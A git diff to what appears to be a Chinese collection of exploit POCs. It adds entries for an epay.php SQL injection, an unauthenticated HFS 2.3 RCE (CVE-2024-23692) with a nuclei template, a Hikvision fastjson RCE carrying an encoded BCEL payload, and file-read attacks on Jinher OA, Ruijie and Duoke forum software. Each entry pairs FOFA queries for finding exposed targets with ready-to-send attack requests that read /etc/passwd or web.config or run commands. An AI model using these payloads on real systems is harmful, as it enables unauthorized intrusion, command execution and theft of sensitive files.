diff --git a/29网课交单平台epay.php存在SQL注入漏洞.md b/29网课交单平台epay.php存在SQL注入漏洞.md new file mode 100644 index 0000000..0bb4fea --- /dev/null +++ b/29网课交单平台epay.php存在SQL注入漏洞.md @@ -0,0 +1,26 @@ +## 29网课交单平台epay.php存在SQL注入漏洞 + +29网课交单平台 /epay/epay.php接口处存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。 + +## fofa + +``` +body="你在看什么呢?我写的代码好看吗" +``` + +## poc + +``` +POST /epay/epay.php HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Content-Type: application/x-www-form-urlencoded +Connection: close + +out_trade_no=' AND (SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA) AND 'aEmC'='aEmC +``` + +![image-20240610144912193](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406101449253.png) \ No newline at end of file diff --git a/HFS2.3未经身份验证的远程代码执行(CVE-2024-23692).md b/HFS2.3未经身份验证的远程代码执行(CVE-2024-23692).md new file mode 100644 index 0000000..f53fed7 --- /dev/null +++ b/HFS2.3未经身份验证的远程代码执行(CVE-2024-23692).md @@ -0,0 +1,66 @@ +## HFS2.3未经身份验证的远程代码执行(CVE-2024-23692) + +Rejetto HTTP 文件服务器 2.3m 未经身份验证的 RCE + +## fofa + +``` +"HttpFileServer" +``` + +## poc + +``` +GET /?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: HFS_SID_=0.590236319694668 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406092216228.png) + +![image-20240611150501738](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406111505997.png) + +## nuclei + +``` +id: CVE-2024-23692 + +info: + name: Rejetto HTTP File Server - Template injection + author: johnk3r + severity: critical + description: | + This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. + reference: + - https://github.com/rapid7/metasploit-framework/pull/19240 + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + metadata: + verified: true + max-request: 1 + shodan-query: product:"HttpFileServer httpd" + tags: cve,cve2024,hfs,rce + +http: + - method: GET + path: + - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - "rejetto" +``` + diff --git a/README.md b/README.md index cc75534..924fe4e 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,15 @@ # 漏洞收集 收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了600多个poc/exp,善用CTRL+F搜索 +## 2024.06.11 新增漏洞 + +- 海康威视综合安防管理平台keepAlive远程代码执行漏洞 +- 金和OA-C6-download.jsp任意文件读取漏洞 +- 锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116) +- HFS2.3未经身份验证的远程代码执行(CVE-2024-23692) +- 29网课交单平台epay.php存在SQL注入漏洞 +- 多客圈子论坛系统httpGet任意文件读取漏洞复现 + ## 2024.06.07 新增漏洞 - 天智云智造管理平台Usermanager.ashx存在SQL注入漏洞 diff --git a/多客圈子论坛系统httpGet任意文件读取漏洞复现.md b/多客圈子论坛系统httpGet任意文件读取漏洞复现.md new file mode 100644 index 0000000..cff387d --- /dev/null +++ b/多客圈子论坛系统httpGet任意文件读取漏洞复现.md @@ -0,0 +1,22 @@ +## 多客圈子论坛系统httpGet任意文件读取漏洞复现 + +多客圈子论坛系统 /index.php/api/login/httpGet 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +``` +body="/static/index/js/jweixin-1.2.0.js" +``` + +## poc + +``` +GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406101451766.png) \ No newline at end of file diff --git a/海康威视综合安防管理平台keepAlive远程代码执行漏洞.md b/海康威视综合安防管理平台keepAlive远程代码执行漏洞.md new file mode 100644 index 0000000..f6b3927 --- /dev/null +++ b/海康威视综合安防管理平台keepAlive远程代码执行漏洞.md @@ -0,0 +1,26 @@ +## 海康威视综合安防管理平台keepAlive远程代码执行漏洞 + + 海康综合安防管理平台keepAlive接口存在 fastjson 反序列化漏洞。攻击者可在未鉴权的情况下,对目标服务器进行远程命令执行,从而获取服务器权限。 + +## fofa + +``` +app="HIKVISION-综合安防管理平台" ||app="HIKVISION-iSecure-Center" +``` + +## poc + +``` +POST /bic/ssoService/v1/keepAlive HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER) +Content-Length: 3330 +Content-Type: application/json +cmd: whoami +Accept-Encoding: gzip, deflate, br +Connection: close + +{"CTGT":{ "a": {"@type": "java.lang.Class","val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"b": {"@type": "java.lang.Class","val": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"}} +``` + +![image-20240608143042824](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406081430904.png) \ No newline at end of file diff --git a/海康威视综合安防系统detection接口存在RCE漏洞.md b/海康威视综合安防系统detection接口存在RCE漏洞.md index b849398..61e689a 100644 --- a/海康威视综合安防系统detection接口存在RCE漏洞.md +++ b/海康威视综合安防系统detection接口存在RCE漏洞.md @@ -1,8 +1,15 @@ ## 海康威视综合安防系统detection接口存在RCE漏洞 -## poc +## fofa + ``` -POST /center/api/installation/detection HTTP/1.1 +app="HIKVISION-综合安防管理平台" ||app="HIKVISION-iSecure-Center" +``` + +## poc + +``` +POST /center/api/installation/detection;.js HTTP/1.1 Host: xx.xx.xx.xx Cache-Control: max-age=0 Sec-Ch-Ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105" diff --git a/金和OA-C6-download.jsp任意文件读取漏洞.md b/金和OA-C6-download.jsp任意文件读取漏洞.md new file mode 100644 index 0000000..ae93f8a --- /dev/null +++ b/金和OA-C6-download.jsp任意文件读取漏洞.md @@ -0,0 +1,18 @@ +## 金和OA-C6-download.jsp任意文件读取漏洞 + +金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息 + +## fofa + +``` +app="Jinher-OA" +``` + +## poc + +``` +/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=download.asp +/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config +``` + +![image-20240609162635854](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406091626910.png) \ No newline at end of file diff --git a/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116).md b/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116).md new file mode 100644 index 0000000..e67ba88 --- /dev/null +++ b/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116).md @@ -0,0 +1,23 @@ +## 锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116) + +校园网自助服务系统/selfservice/selfservice/module/scgroup/web/login_judge.jsf 接口处存在任意文件读取漏洞,经过分析和研判,该漏洞利用难度低,可导致敏感信息泄漏,建议尽快修复。 + +## fofa + +``` +body="校园网自助服务系统" +``` + +## poc + +``` +GET /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20240609163957648](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406091639825.png) \ No newline at end of file